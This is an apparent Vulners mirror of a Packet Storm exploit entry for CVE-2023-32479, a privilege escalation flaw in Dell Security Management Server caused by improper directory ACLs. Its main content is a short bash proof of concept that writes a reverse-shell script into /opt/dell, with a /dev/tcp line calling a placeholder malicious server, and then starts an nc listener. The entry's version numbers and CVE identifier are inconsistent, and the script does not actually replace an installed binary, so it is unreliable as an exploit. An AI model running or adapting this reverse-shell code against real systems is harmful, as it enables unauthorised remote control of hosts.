Lucene search
K

Dell Security Management Server Privilege Escalation

🗓️ 28 Mar 2024 00:00:00Reported by Amirhossein BahramizadehType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 347 Views

Dell Security Management Server Privilege Escalation CVE-2023-3247

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Dell Security Management Server <1.9.0 - Local Privilege Escalation Exploit
29 Mar 202400:00
zdt
Circl
CVE-2023-32479
6 Feb 202409:26
circl
CNNVD
Dell Multiple Product Security Breaches
6 Feb 202400:00
cnnvd
CVE
CVE-2023-32479
6 Feb 202408:09
cve
Cvelist
CVE-2023-32479
6 Feb 202408:09
cvelist
Exploit DB
Dell Security Management Server &lt;1.9.0 - Local Privilege Escalation
28 Mar 202400:00
exploitdb
EUVD
EUVD-2023-36723
3 Oct 202520:07
euvd
NVD
CVE-2023-32479
6 Feb 202408:15
nvd
Prion
Privilege escalation
6 Feb 202408:15
prion
Positive Technologies
PT-2024-1644 · Dell · Dell Endpoint Security Suite Enterprise +2
6 Feb 202400:00
ptsecurity
Rows per page
`# Exploit Title: [title] Dell Security Management Server versions prior to  
11.9.0  
# Exploit Author: [author] Amirhossein Bahramizadeh  
# CVE : [if applicable] CVE-2023-32479  
Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security  
Management  
Server versions prior to 11.9.0 contain privilege escalation vulnerability  
due to improper ACL of the non-default installation directory. A local  
malicious user could potentially exploit this vulnerability by replacing  
binaries in installed directory and taking the reverse shell of the system  
leading to Privilege Escalation.  
  
#!/bin/bash  
  
INSTALL_DIR="/opt/dell"  
  
# Check if the installed directory has improper ACLs  
if [ -w "$INSTALL_DIR" ]; then  
# Replace a binary in the installed directory with a malicious binary that opens a reverse shell  
echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"  
echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"  
chmod +x "$INSTALL_DIR/dell-exploit"  
  
# Wait for the reverse shell to connect to your malicious server  
nc -lvnp 1234  
fi  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.16.7 - 7.8
EPSS0.00043
SSVC
347